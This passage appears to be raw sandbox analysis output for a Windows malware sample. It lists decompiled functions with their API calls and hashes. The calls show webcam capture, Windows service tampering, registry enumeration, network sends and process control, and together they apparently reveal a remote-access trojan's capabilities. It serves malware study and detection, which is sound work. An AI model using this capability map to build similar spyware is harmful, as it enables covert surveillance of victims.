                                                                                • Opcode Fuzzy Hash: b8fade3388712e20a6f67c03e6901a2274372487572bf270bb9750812de2a36e
                                                                                • Instruction Fuzzy Hash: 0781FA72A00B06DBE7249E79DC46FEA73A9AF41324F24852EF721D7681E778E940C750
                                                                                APIs
                                                                                • _free.LIBCMT ref: 007C2DCF
                                                                                • _free.LIBCMT ref: 007C2DE9
                                                                                • _free.LIBCMT ref: 007C2DF4
                                                                                • _free.LIBCMT ref: 007C2EC8
                                                                                • _free.LIBCMT ref: 007C2EE4
                                                                                  • Part of subcall function 007BAABB: IsProcessorFeaturePresent.KERNEL32(00000017,007BAA8D,?,?,00781BC9,?,?,00000000,?,?,007BAAAD,00000000,00000000,00000000,00000000,00000000), ref: 007BAABD
                                                                                  • Part of subcall function 007BAABB: GetCurrentProcess.KERNEL32(C0000417), ref: 007BAADF
                                                                                  • Part of subcall function 007BAABB: TerminateProcess.KERNEL32(00000000), ref: 007BAAE6
                                                                                • _free.LIBCMT ref: 007C2EEE
                                                                                Memory Dump Source
                                                                                • Source File: 00000006.00000002.4146476987.0000000000780000.00000040.00001000.00020000.00000000.sdmp, Offset: 00780000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_6_2_780000_nicetomeetyousweeet.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: _free$Process$CurrentFeaturePresentProcessorTerminate
                                                                                • String ID:
                                                                                • API String ID: 2329545287-0
                                                                                • Opcode ID: e40ad7fbed77d86ed48c5751771db778d898a633fb700c5612ced942e7692302
                                                                                • Instruction ID: 677785769c0bacfd9de89bfb3d87c4728617e75a1edbcff8d8b2ad6c17998af3
                                                                                • Opcode Fuzzy Hash: e40ad7fbed77d86ed48c5751771db778d898a633fb700c5612ced942e7692302
                                                                                • Instruction Fuzzy Hash: 86519036604215ABDF249F78D889FBA77A9DF45710F24405DF905A7143EA3A9D43C390
                                                                                APIs
                                                                                • MultiByteToWideChar.KERNEL32(00000001,00000000,?,?,00000000,00000000,?,?,?,?,?,?,007C9E08,00000001,00000001,00000006), ref: 007C9C11
                                                                                • MultiByteToWideChar.KERNEL32(00000001,00000001,?,?,00000000,?,?,?,?,?,?,?,007C9E08,00000001,00000001,00000006), ref: 007C9C97
                                                                                • WideCharToMultiByte.KERNEL32(00000001,00000000,00000000,00000000,?,00000006,00000000,00000000,?,00000400,00000000,?,00000000,00000000,00000000,00000000), ref: 007C9D91
                                                                                • __freea.LIBCMT ref: 007C9D9E
                                                                                  • Part of subcall function 007C6D66: RtlAllocateHeap.NTDLL(00000000,007B468A,?), ref: 007C6D98
                                                                                • __freea.LIBCMT ref: 007C9DA7
                                                                                • __freea.LIBCMT ref: 007C9DCC
                                                                                Memory Dump Source
                                                                                • Source File: 00000006.00000002.4146476987.0000000000780000.00000040.00001000.00020000.00000000.sdmp, Offset: 00780000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_6_2_780000_nicetomeetyousweeet.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: ByteCharMultiWide__freea$AllocateHeap
                                                                                • String ID:
                                                                                • API String ID: 1414292761-0
                                                                                • Opcode ID: a4f5f7d7e0253137201d24c54ea4cf660dd43f3a14d4cde2709bba3cbd133d87
                                                                                • Instruction ID: 098f4db3ddff9ebea153288a4aee3f214d5f51ce3dda6104006b6091f1e53a82
                                                                                • Opcode Fuzzy Hash: a4f5f7d7e0253137201d24c54ea4cf660dd43f3a14d4cde2709bba3cbd133d87
                                                                                • Instruction Fuzzy Hash: 4651D072700216AFDB658F64CC89FAE7BA9EF40B50F15466DFE06E6240EB39DC50C660
                                                                                APIs
                                                                                Memory Dump Source
                                                                                • Source File: 00000006.00000002.4145931903.0000000000400000.00000040.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000006.00000002.4145931903.0000000000473000.00000040.00000001.01000000.0000000C.sdmp
                                                                                • Associated: 00000006.00000002.4145931903.0000000000476000.00000040.00000001.01000000.0000000C.sdmp
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_6_2_400000_nicetomeetyousweeet.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: __cftoe
                                                                                • String ID:
                                                                                • API String ID: 4189289331-0
                                                                                • Opcode ID: 07fcb3c060a749777e725642930ed18157a1f5019e1f3146b4d3bc33616e3b2a
                                                                                • Instruction ID: 646e0444ce84107b4b6d0ff1d92098e8eb0dfa86acef9ec08128487301265115
                                                                                • Opcode Fuzzy Hash: 07fcb3c060a749777e725642930ed18157a1f5019e1f3146b4d3bc33616e3b2a
                                                                                • Instruction Fuzzy Hash: A851FC72900105ABFB249F598C81F6F77A9EFC9324F15421FF815A6281DB3DDD01866D
                                                                                APIs
                                                                                Memory Dump Source
                                                                                • Source File: 00000006.00000002.4146476987.0000000000780000.00000040.00001000.00020000.00000000.sdmp, Offset: 00780000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_6_2_780000_nicetomeetyousweeet.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: __cftoe
                                                                                • String ID:
                                                                                • API String ID: 4189289331-0
                                                                                • Opcode ID: 69df1f9648de409375186bf4c737c9597d71512c260aa95240f454dab3e526b7
                                                                                • Instruction ID: 585e3e26d6f64f5368c96462d1a5643e5df64f89d957e55e687ce5556b051f73
                                                                                • Opcode Fuzzy Hash: 69df1f9648de409375186bf4c737c9597d71512c260aa95240f454dab3e526b7
                                                                                • Instruction Fuzzy Hash: 1551E632900205FBDB25AB688C59FEE77A9EF89730F25411DF815A6192EB3DDD00C664
                                                                                APIs
                                                                                Memory Dump Source
                                                                                • Source File: 00000006.00000002.4146476987.0000000000780000.00000040.00001000.00020000.00000000.sdmp, Offset: 00780000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_6_2_780000_nicetomeetyousweeet.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: _free$Info
                                                                                • String ID:
                                                                                • API String ID: 2509303402-0
                                                                                • Opcode ID: 15c1efeab650589001bcb3423f25e61575b515edc70c88f8593ca702e347ec5e
                                                                                • Instruction ID: ee2cb72564e267909161a0acc8974f26539ab11b0454d236e1d1e0f9eb9ced59
                                                                                • Opcode Fuzzy Hash: 15c1efeab650589001bcb3423f25e61575b515edc70c88f8593ca702e347ec5e
                                                                                • Instruction Fuzzy Hash: 5E5141B0A00705AEDB109F65C885FEEBBF9FF48301F44442DF599B6241D77AA9818B21
                                                                                APIs
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000006.00000002.4145931903.0000000000400000.00000040.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000006.00000002.4145931903.0000000000473000.00000040.00000001.01000000.0000000C.sdmp
                                                                                • Associated: 00000006.00000002.4145931903.0000000000476000.00000040.00000001.01000000.0000000C.sdmp
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_6_2_400000_nicetomeetyousweeet.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: __freea$__alloca_probe_16
                                                                                • String ID: a/p$am/pm
                                                                                • API String ID: 3509577899-3206640213
                                                                                • Opcode ID: d668ed5ce2b854fb72e884dc7fab13e06c8dfc9310cdef7ee07e25d8e59df702
                                                                                • Instruction ID: cf09b504ad0dd49156c227457699755419044adef71e8be36bbdd309731302d4
                                                                                • Opcode Fuzzy Hash: d668ed5ce2b854fb72e884dc7fab13e06c8dfc9310cdef7ee07e25d8e59df702
                                                                                • Instruction Fuzzy Hash: 5FD1F271A00206EAFB249F68D945ABBB7B0FF06300F26415BE905AB749D37D8D41CB5B
                                                                                APIs
                                                                                • Sleep.KERNEL32(00000000), ref: 00403E8A
                                                                                  • Part of subcall function 00403FCD: __EH_prolog.LIBCMT ref: 00403FD2
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000006.00000002.4145931903.0000000000400000.00000040.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000006.00000002.4145931903.0000000000473000.00000040.00000001.01000000.0000000C.sdmp
                                                                                • Associated: 00000006.00000002.4145931903.0000000000476000.00000040.00000001.01000000.0000000C.sdmp
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_6_2_400000_nicetomeetyousweeet.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: H_prologSleep
                                                                                • String ID: CloseCamera$FreeFrame$GetFrame$OpenCamera$P>G
                                                                                • API String ID: 3469354165-462540288
                                                                                • Opcode ID: da46002fc2985b2ef131603759b010d57e67311458491ebb77e3f1f5b4e35114
                                                                                • Instruction ID: 0dce3c58988623f436d5c5d916b021fc345e3c2d86dff9f08dc17926b78fee06
                                                                                • Opcode Fuzzy Hash: da46002fc2985b2ef131603759b010d57e67311458491ebb77e3f1f5b4e35114
                                                                                • Instruction Fuzzy Hash: A441A330A0420197CA14FB79C816AAD3A655B45704F00453FF809A73E2EF7C9A45C7CF
                                                                                APIs
                                                                                • Sleep.KERNEL32(00000000), ref: 007840F1
                                                                                  • Part of subcall function 00784234: __EH_prolog.LIBCMT ref: 00784239
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000006.00000002.4146476987.0000000000780000.00000040.00001000.00020000.00000000.sdmp, Offset: 00780000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_6_2_780000_nicetomeetyousweeet.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: H_prologSleep
                                                                                • String ID: CloseCamera$FreeFrame$GetFrame$OpenCamera$P>G
                                                                                • API String ID: 3469354165-462540288
                                                                                • Opcode ID: 37a605f6fc1509c022d5344fe3f73bddb8cf724610274ffecc6b5ec626bfb4aa
                                                                                • Instruction ID: 56076acc1610f40a33660a61bdb7a48abf30d1870d77c53830212e90b116a7cc
                                                                                • Opcode Fuzzy Hash: 37a605f6fc1509c022d5344fe3f73bddb8cf724610274ffecc6b5ec626bfb4aa
                                                                                • Instruction Fuzzy Hash: 1041D430E88201DBCB14FB78D81E66D37A6AB41340F004529F909876E6EF7C9E46C786
                                                                                APIs
                                                                                • CreateFileW.KERNEL32(00000000,00000004,00000000,00000000,00000002,00000080,00000000), ref: 00786E9F
                                                                                • WriteFile.KERNEL32(00000000,?,00000000,?,00000000,?,000186A0), ref: 00786EE7
                                                                                  • Part of subcall function 007846CF: send.WS2_32(?,00000000,00000000,00000000), ref: 00784764
                                                                                • CloseHandle.KERNEL32(00000000), ref: 00786F27
                                                                                • MoveFileW.KERNEL32(00000000,00000000), ref: 00786F44
                                                                                • CloseHandle.KERNEL32(00000000,00000057,?,00000008), ref: 00786F6F
                                                                                • DeleteFileW.KERNEL32(00000000), ref: 00786F7F
                                                                                  • Part of subcall function 007847C2: WaitForSingleObject.KERNEL32(?,000000FF,?,?,00784875,00000000,?,?), ref: 007847D1
                                                                                  • Part of subcall function 007847C2: SetEvent.KERNEL32(?,?,?,00784875,00000000,?,?), ref: 007847EF
                                                                                Memory Dump Source
                                                                                • Source File: 00000006.00000002.4146476987.0000000000780000.00000040.00001000.00020000.00000000.sdmp, Offset: 00780000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_6_2_780000_nicetomeetyousweeet.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: File$CloseHandle$CreateDeleteEventMoveObjectSingleWaitWritesend
                                                                                • String ID:
                                                                                • API String ID: 1303771098-0
                                                                                • Opcode ID: 7cdf14121b30b943d831dc041884720089c76492bcd48607f22f732c73577ab1
                                                                                • Instruction ID: 5502fee0509eff0742da7ccc6328fc8dc46a9e8844f7fda019e53f43a3597c09
                                                                                • Opcode Fuzzy Hash: 7cdf14121b30b943d831dc041884720089c76492bcd48607f22f732c73577ab1
                                                                                • Instruction Fuzzy Hash: 1A31A471548305EFC610FF20DD49DAFB7A8FB84711F40492DF98592152EB789A48CB56
                                                                                APIs
                                                                                • OpenSCManagerW.ADVAPI32(00000000,00000000,00000002,00000000,?,00000000,?,?,00419507,00000000,00000000), ref: 00419DFC
                                                                                • OpenServiceW.ADVAPI32(00000000,00000000,00000002,?,00000000,?,?,00419507,00000000,00000000), ref: 00419E10
                                                                                • CloseServiceHandle.ADVAPI32(00000000,?,00000000,?,?,00419507,00000000,00000000), ref: 00419E1D
                                                                                • ChangeServiceConfigW.ADVAPI32(00000000,000000FF,00000004,000000FF,00000000,00000000,00000000,00000000,00000000,00000000,00000000,?,00000000,?,?,00419507), ref: 00419E52
                                                                                • CloseServiceHandle.ADVAPI32(00000000,?,00000000,?,?,00419507,00000000,00000000), ref: 00419E64
                                                                                • CloseServiceHandle.ADVAPI32(00000000,?,00000000,?,?,00419507,00000000,00000000), ref: 00419E67
                                                                                Memory Dump Source
                                                                                • Source File: 00000006.00000002.4145931903.0000000000400000.00000040.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000006.00000002.4145931903.0000000000473000.00000040.00000001.01000000.0000000C.sdmp
                                                                                • Associated: 00000006.00000002.4145931903.0000000000476000.00000040.00000001.01000000.0000000C.sdmp
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_6_2_400000_nicetomeetyousweeet.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: Service$CloseHandle$Open$ChangeConfigManager
                                                                                • String ID:
                                                                                • API String ID: 493672254-0
                                                                                • Opcode ID: 9c52c2ac0f13bfd00a15fb34cb1c599d7e3f92645b87278aa81d0ee05283a4d7
                                                                                • Instruction ID: c28812c6d5a3476d8c1fe7dae916194da5da8b168be8dbaba893861dad7fc5da
                                                                                • Opcode Fuzzy Hash: 9c52c2ac0f13bfd00a15fb34cb1c599d7e3f92645b87278aa81d0ee05283a4d7
                                                                                • Instruction Fuzzy Hash: 3301F5311483147AD7119B39EC5EEBF3AACDB42B71F10022BF526D62D1DA68DE8181A9
                                                                                APIs
                                                                                • OpenSCManagerW.ADVAPI32(00000000,00000000,00000011), ref: 00799EFB
                                                                                • OpenServiceW.ADVAPI32(00000000,00000000,000F003F), ref: 00799F12
                                                                                • CloseServiceHandle.ADVAPI32(00000000), ref: 00799F1F
                                                                                • ControlService.ADVAPI32(00000000,00000001,?), ref: 00799F2E
                                                                                Memory Dump Source
                                                                                • Source File: 00000006.00000002.4146476987.0000000000780000.00000040.00001000.00020000.00000000.sdmp, Offset: 00780000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_6_2_780000_nicetomeetyousweeet.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: Service$Open$CloseControlHandleManager
                                                                                • String ID:
                                                                                • API String ID: 1243734080-0
                                                                                • Opcode ID: 90cb661901cd042af288c915e3e3b558208b36f008bb68e694e16de296acffd5
                                                                                • Instruction ID: f623557bf220e2e7f4327ddbc0ab6b28b8008fc9a53d5e71cebe206ee94aa562
                                                                                • Opcode Fuzzy Hash: 90cb661901cd042af288c915e3e3b558208b36f008bb68e694e16de296acffd5
                                                                                • Instruction Fuzzy Hash: A811C632545218AFEB116B64EC89DFF3BACDB45BA2B000039F602D21C2DB64CC06DAB0
                                                                                APIs
                                                                                • GetLastError.KERNEL32(?,?,00437DFD,004377B1), ref: 00437E14
                                                                                • ___vcrt_FlsGetValue.LIBVCRUNTIME ref: 00437E22
                                                                                • ___vcrt_FlsSetValue.LIBVCRUNTIME ref: 00437E3B
                                                                                • SetLastError.KERNEL32(00000000,?,00437DFD,004377B1), ref: 00437E8D
                                                                                Memory Dump Source
                                                                                • Source File: 00000006.00000002.4145931903.0000000000400000.00000040.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000006.00000002.4145931903.0000000000473000.00000040.00000001.01000000.0000000C.sdmp
                                                                                • Associated: 00000006.00000002.4145931903.0000000000476000.00000040.00000001.01000000.0000000C.sdmp
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_6_2_400000_nicetomeetyousweeet.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: ErrorLastValue___vcrt_
                                                                                • String ID:
                                                                                • API String ID: 3852720340-0
                                                                                • Opcode ID: 91ac95939cd3c96bc489c52a0530c238d3093d1082c7131376b84a6130b97103
                                                                                • Instruction ID: be779a20f6972cc68ff7cd304671387be2c97454b743a33de387a584dbd8fa65
                                                                                • Opcode Fuzzy Hash: 91ac95939cd3c96bc489c52a0530c238d3093d1082c7131376b84a6130b97103
                                                                                • Instruction Fuzzy Hash: 2A01D8B222D315ADEB3427757C87A172699EB09779F2013BFF228851E1EF294C41914C
                                                                                APIs
                                                                                • GetLastError.KERNEL32(?,?,007B8064,007B7A18), ref: 007B807B
                                                                                • ___vcrt_FlsGetValue.LIBVCRUNTIME ref: 007B8089
                                                                                • ___vcrt_FlsSetValue.LIBVCRUNTIME ref: 007B80A2
                                                                                • SetLastError.KERNEL32(00000000,?,007B8064,007B7A18), ref: 007B80F4
                                                                                Memory Dump Source
                                                                                • Source File: 00000006.00000002.4146476987.0000000000780000.00000040.00001000.00020000.00000000.sdmp, Offset: 00780000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_6_2_780000_nicetomeetyousweeet.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: ErrorLastValue___vcrt_
                                                                                • String ID:
                                                                                • API String ID: 3852720340-0
                                                                                • Opcode ID: 8677577c8e37d81537f7299acd8b5f5a9cc683e2404a7ed47504fd76d00458cf
                                                                                • Instruction ID: 6397aad39f6dbc003042d40d3a5c649a00b325416f78ac9f522f63568385a942
                                                                                • Opcode Fuzzy Hash: 8677577c8e37d81537f7299acd8b5f5a9cc683e2404a7ed47504fd76d00458cf
                                                                                • Instruction Fuzzy Hash: 2A01B13251A316EEE6643678BC8DBE7264CEB017B5B20023AF728851E1EE194844E246
                                                                                APIs
                                                                                • GetLastError.KERNEL32(?,0043E260,0043931C,0043E260,?,?,0043B955,FF8BC35D), ref: 00446EC3
                                                                                • _free.LIBCMT ref: 00446EF6
                                                                                • _free.LIBCMT ref: 00446F1E
                                                                                • SetLastError.KERNEL32(00000000,FF8BC35D), ref: 00446F2B
                                                                                • SetLastError.KERNEL32(00000000,FF8BC35D), ref: 00446F37
                                                                                • _abort.LIBCMT ref: 00446F3D
                                                                                Memory Dump Source
                                                                                • Source File: 00000006.00000002.4145931903.0000000000400000.00000040.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000006.00000002.4145931903.0000000000473000.00000040.00000001.01000000.0000000C.sdmp
                                                                                • Associated: 00000006.00000002.4145931903.0000000000476000.00000040.00000001.01000000.0000000C.sdmp
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_6_2_400000_nicetomeetyousweeet.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: ErrorLast$_free$_abort
                                                                                • String ID:
                                                                                • API String ID: 3160817290-0
                                                                                • Opcode ID: c8da7f0c6bc53abe63124bd11b18efa7ba6299d8fddab580282761fd2749e6ad
                                                                                • Instruction ID: 3d2b287d931d31d162837175e2379b90ae0e47a7897f975c134f35b9cb22fcab
                                                                                • Opcode Fuzzy Hash: c8da7f0c6bc53abe63124bd11b18efa7ba6299d8fddab580282761fd2749e6ad
                                                                                • Instruction Fuzzy Hash: 2AF0F93560870177F6226339BD45A6F16559BC37A6F36003FF414A2293EE2D8C46451F
                                                                                APIs
                                                                                • GetLastError.KERNEL32(?,007BE4C7,007B9583,007BE4C7,00475B70,?,007BBBBC,FF8BC35D,00475B70,00473EE8), ref: 007C712A
                                                                                • _free.LIBCMT ref: 007C715D
                                                                                • _free.LIBCMT ref: 007C7185
                                                                                • SetLastError.KERNEL32(00000000,FF8BC35D,00475B70,00473EE8), ref: 007C7192
                                                                                • SetLastError.KERNEL32(00000000,FF8BC35D,00475B70,00473EE8), ref: 007C719E
                                                                                • _abort.LIBCMT ref: 007C71A4
                                                                                Memory Dump Source
                                                                                • Source File: 00000006.00000002.4146476987.0000000000780000.00000040.00001000.00020000.00000000.sdmp, Offset: 00780000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_6_2_780000_nicetomeetyousweeet.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: ErrorLast$_free$_abort
                                                                                • String ID:
                                                                                • API String ID: 3160817290-0
                                                                                • Opcode ID: c8da7f0c6bc53abe63124bd11b18efa7ba6299d8fddab580282761fd2749e6ad
                                                                                • Instruction ID: c2e4657df95ca004b783a51642d17386ba40c0aa29abe5ddf15a18ef02bc4199
                                                                                • Opcode Fuzzy Hash: c8da7f0c6bc53abe63124bd11b18efa7ba6299d8fddab580282761fd2749e6ad
                                                                                • Instruction Fuzzy Hash: E8F0A93524C714A7C65A23347C4FF2F2766DBC17A2F28012CF558D6191EF2D8C42C915
                                                                                APIs
                                                                                • OpenSCManagerW.ADVAPI32(00000000,00000000,00000020,00000000,?,?,?,?,?,?,0041979B,00000000,00000000), ref: 00419C2F
                                                                                • OpenServiceW.ADVAPI32(00000000,00000000,00000020,?,?,?,?,?,?,0041979B,00000000,00000000), ref: 00419C43
                                                                                • CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,0041979B,00000000,00000000), ref: 00419C50
                                                                                • ControlService.ADVAPI32(00000000,00000001,?,?,?,?,?,?,?,0041979B,00000000,00000000), ref: 00419C5F
                                                                                • CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,0041979B,00000000,00000000), ref: 00419C71
                                                                                • CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,0041979B,00000000,00000000), ref: 00419C74
                                                                                Memory Dump Source
                                                                                • Source File: 00000006.00000002.4145931903.0000000000400000.00000040.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000006.00000002.4145931903.0000000000473000.00000040.00000001.01000000.0000000C.sdmp
                                                                                • Associated: 00000006.00000002.4145931903.0000000000476000.00000040.00000001.01000000.0000000C.sdmp
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_6_2_400000_nicetomeetyousweeet.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: Service$CloseHandle$Open$ControlManager
                                                                                • String ID:
                                                                                • API String ID: 221034970-0
                                                                                • Opcode ID: c693f0bc68fef192fd8e3cc27c6266fde5d6bb81be54592a093b1dffb845cd77
                                                                                • Instruction ID: e05d85410d15b39c35b215a1997cf582e970b4d0c8f2e3caff6268b58306b2a8
                                                                                • Opcode Fuzzy Hash: c693f0bc68fef192fd8e3cc27c6266fde5d6bb81be54592a093b1dffb845cd77
                                                                                • Instruction Fuzzy Hash: F2F0F6325003147BD3116B25EC89EFF3BACDB45BA1F000036F902921D2DB68CD4685F5
                                                                                APIs
                                                                                • OpenSCManagerW.ADVAPI32(00000000,00000000,00000040,00000000,?,?,?,?,?,?,00419719,00000000,00000000), ref: 00419D31
                                                                                • OpenServiceW.ADVAPI32(00000000,00000000,00000040,?,?,?,?,?,?,00419719,00000000,00000000), ref: 00419D45
                                                                                • CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,00419719,00000000,00000000), ref: 00419D52
                                                                                • ControlService.ADVAPI32(00000000,00000002,?,?,?,?,?,?,?,00419719,00000000,00000000), ref: 00419D61
                                                                                • CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,00419719,00000000,00000000), ref: 00419D73
                                                                                • CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,00419719,00000000,00000000), ref: 00419D76
                                                                                Memory Dump Source
                                                                                • Source File: 00000006.00000002.4145931903.0000000000400000.00000040.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000006.00000002.4145931903.0000000000473000.00000040.00000001.01000000.0000000C.sdmp
                                                                                • Associated: 00000006.00000002.4145931903.0000000000476000.00000040.00000001.01000000.0000000C.sdmp
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_6_2_400000_nicetomeetyousweeet.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: Service$CloseHandle$Open$ControlManager
                                                                                • String ID:
                                                                                • API String ID: 221034970-0
                                                                                • Opcode ID: 23c436ef8f68778fffd06b1cb2ac843769c73bea320e54bed0ee7a0f63c6b0f5
                                                                                • Instruction ID: 9e91e616c68215657d038be5823d6e3897a30bcf6e0764f9fcdf2292ad9a2404
                                                                                • Opcode Fuzzy Hash: 23c436ef8f68778fffd06b1cb2ac843769c73bea320e54bed0ee7a0f63c6b0f5
                                                                                • Instruction Fuzzy Hash: C5F062725003146BD2116B65EC89EBF3BACDB45BA5B00003AFA06A21D2DB68DD4696F9
                                                                                APIs
                                                                                • OpenSCManagerW.ADVAPI32(00000000,00000000,00000040,00000000,?,?,?,?,?,?,00419697,00000000,00000000), ref: 00419D96
                                                                                • OpenServiceW.ADVAPI32(00000000,00000000,00000040,?,?,?,?,?,?,00419697,00000000,00000000), ref: 00419DAA
                                                                                • CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,00419697,00000000,00000000), ref: 00419DB7
                                                                                • ControlService.ADVAPI32(00000000,00000003,?,?,?,?,?,?,?,00419697,00000000,00000000), ref: 00419DC6
                                                                                • CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,00419697,00000000,00000000), ref: 00419DD8
                                                                                • CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,00419697,00000000,00000000), ref: 00419DDB
                                                                                Memory Dump Source
                                                                                • Source File: 00000006.00000002.4145931903.0000000000400000.00000040.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000006.00000002.4145931903.0000000000473000.00000040.00000001.01000000.0000000C.sdmp
                                                                                • Associated: 00000006.00000002.4145931903.0000000000476000.00000040.00000001.01000000.0000000C.sdmp
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_6_2_400000_nicetomeetyousweeet.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: Service$CloseHandle$Open$ControlManager
                                                                                • String ID:
                                                                                • API String ID: 221034970-0
                                                                                • Opcode ID: 08e91ba94b6aa68f46c9b0408f5ff7d04a74b604ebddb06d2a7ddc98e94a4f98
                                                                                • Instruction ID: abda6543b9bae7672c93be1b0f3a8a56711a85df89096aceaf06b6c73a90a6e4
                                                                                • Opcode Fuzzy Hash: 08e91ba94b6aa68f46c9b0408f5ff7d04a74b604ebddb06d2a7ddc98e94a4f98
                                                                                • Instruction Fuzzy Hash: C2F0C2325002146BD2116B24FC49EBF3AACDB45BA1B04003AFA06A21D2DB28CE4685F8
                                                                                APIs
                                                                                • RegQueryInfoKeyW.ADVAPI32(?,?,?,00000000,?,?,?,?,?,?,?,?), ref: 00412A1D
                                                                                • RegEnumKeyExW.ADVAPI32(?,00000000,?,?,00000000,00000000,00000000,?,?,?,?,00000000,?,?,?,?), ref: 00412A4C
                                                                                • RegEnumValueW.ADVAPI32(?,00000000,?,?,00000000,?,?,00002710,?,?,?,00000000,?,?,?,?), ref: 00412AED
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000006.00000002.4145931903.0000000000400000.00000040.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000006.00000002.4145931903.0000000000473000.00000040.00000001.01000000.0000000C.sdmp
                                                                                • Associated: 00000006.00000002.4145931903.0000000000476000.00000040.00000001.01000000.0000000C.sdmp
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_6_2_400000_nicetomeetyousweeet.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: Enum$InfoQueryValue
                                                                                • String ID: [regsplt]$DG
                                                                                • API String ID: 3554306468-1089238109
                                                                                • Opcode ID: c7257a80ca0406e2e64fcff0ff55628a337409a0c8b42eebab18550c86fe5037
                                                                                • Instruction ID: 09469598a034e88a10af8fecb22bb8a395a4bc85e225d04bcc93034602455e52
                                                                                • Opcode Fuzzy Hash: c7257a80ca0406e2e64fcff0ff55628a337409a0c8b42eebab18550c86fe5037
                                                                                • Instruction Fuzzy Hash: D8512E72108345AFD310EB61D995DEFB7ECEF84744F00493EB585D2191EB74EA088B6A
                                                                                APIs
                                                                                  • Part of subcall function 00791900: TerminateProcess.KERNEL32(00000000,?,0078C8E4), ref: 00791910
                                                                                  • Part of subcall function 00791900: WaitForSingleObject.KERNEL32(000000FF,?,0078C8E4), ref: 00791923
                                                                                  • Part of subcall function 007928C4: RegOpenKeyExA.ADVAPI32(80000001,00000000,00000000,00020019,?,00000208), ref: 007928E0
                                                                                  • Part of subcall function 007928C4: RegQueryValueExA.ADVAPI32(?,?,00000000,00000000,00000000,00000000), ref: 007928F9
                                                                                  • Part of subcall function 007928C4: RegCloseKey.ADVAPI32(?), ref: 00792904
                                                                                • GetModuleFileNameW.KERNEL32(00000000,?,00000208), ref: 0078C92E
                                                                                • ShellExecuteW.SHELL32(00000000,0046559C,00000000,00465900,00465900,00000000), ref: 0078CA8D
                                                                                • ExitProcess.KERNEL32 ref: 0078CA99
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000006.00000002.4146476987.0000000000780000.00000040.00001000.00020000.00000000.sdmp, Offset: 00780000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
